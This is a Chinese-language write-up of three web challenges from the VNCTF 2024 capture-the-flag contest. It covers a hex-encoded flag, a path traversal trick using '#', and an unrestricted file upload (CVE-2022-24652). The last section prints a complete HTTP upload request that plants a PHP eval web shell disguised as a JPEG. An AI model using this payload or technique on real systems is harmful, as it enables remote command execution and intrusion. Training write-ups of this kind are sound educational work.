VNCTF 2024 Web方向 WP

Checkin

Welcome to VNCTF 2024~ long time no see.


查看源代码找到game.js找到这一行后16进制解码得到flag

CutePath

源自一次现实渗透
经测试发现在路径后加上井号（#）就可以在后面实现目录穿越找到flag后但无法查看，随着目录查看找到一个md5名字的文件复制下来查一下发现用户名密码将flag.txt重命名到test.txt目录下取名flag.txt打开得到flag

TrySent

Just TrySent
出错不影响解题
打开题目注册一个用户后登录
看到上传头像位置
这其实就是CVE-2022-24652，危险类型文件的不加限制上传，是文件上传漏洞。漏洞路由/user/upload/upload
参考文章：
https://avd.aliyun.com/detail?id=AVD-2022-24651
https://blog.hanayuzu.top/articles/37dacab4.html
https://blog.csdn.net/Jayjay___/article/details/136141648
自己构建文件上传包

POST /user/upload/upload HTTP/1.1
Host: 9b93150f-7270-495e-a0fb-9d0afae0a0c4.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 765


------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"

test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"

image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"

164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg

aaaa
<?php eval($_POST[1]);?>

------WebKitFormBoundaryrhx2kYAMYDqoTThz--

成功后访问后命令执行，得到flag